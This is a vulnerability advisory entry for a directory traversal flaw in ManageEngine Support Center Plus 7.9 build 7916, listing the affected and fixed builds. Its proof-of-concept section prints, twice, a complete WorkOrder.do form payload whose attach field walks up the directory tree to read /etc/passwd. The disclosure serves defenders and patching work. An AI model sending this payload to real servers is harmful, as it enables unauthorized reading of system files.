ManageEngine Support Center Plus 'WorkOrder.do' Directory Traversal Vulnerability
BID:65199
Info
ManageEngine Support Center Plus 'WorkOrder.do' Directory Traversal Vulnerability
| Bugtraq ID: | 65199 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 28 2014 12:00AM |
| Updated: | Jan 28 2014 12:00AM |
| Credit: | xistence |
| Vulnerable: |
ManageEngine Support Center Plus 7.9 build 7916 |
| Not Vulnerable: |
ManageEngine Support Center Plus 7.9 build 7917 |
Exploit / POC
ManageEngine Support Center Plus 'WorkOrder.do' Directory Traversal Vulnerability
The following example data is available:
category=&MOD_IND=WorkOrder&attachments=passwd&subCategory=0&addWO=addWO&title=pwned&attPath=&component=Request&reqTemplate=&reqName=Guest&priority=2&item=0&reqID=2&attSize=31337&autoCCList=&FORMNAME=WorkOrderForm&usertypename=Requester&attach=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&prodId=0&description=WorkOrder.do
The following example data is available:
category=&MOD_IND=WorkOrder&attachments=passwd&subCategory=0&addWO=addWO&title=pwned&attPath=&component=Request&reqTemplate=&reqName=Guest&priority=2&item=0&reqID=2&attSize=31337&autoCCList=&FORMNAME=WorkOrderForm&usertypename=Requester&attach=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&prodId=0&description=WorkOrder.do